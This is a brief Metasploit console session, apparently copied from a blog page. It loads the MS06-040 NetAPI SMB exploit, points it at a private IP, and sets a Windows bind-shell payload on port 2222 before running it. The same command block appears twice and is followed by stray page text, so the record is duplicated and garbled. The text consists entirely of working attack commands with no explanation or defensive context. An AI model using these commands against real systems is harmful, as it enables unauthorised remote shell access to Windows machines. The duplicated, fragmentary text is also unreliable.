msf > use exploit/windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > set RHOST 192.168.121.129
RHOST => 192.168.121.129
msf exploit(ms06_040_netapi) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(ms06_040_netapi) > set LPORT 2222
LPORT => 2222
msf exploit(ms06_040_netapi) > exploit
msf exploit(ms06_040_netapi) > set RHOST 192.168.121.129
RHOST => 192.168.121.129
msf exploit(ms06_040_netapi) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(ms06_040_netapi) > set LPORT 2222
LPORT => 2222
msf exploit(ms06_040_netapi) > exploit

1230

被折叠的 条评论
为什么被折叠?



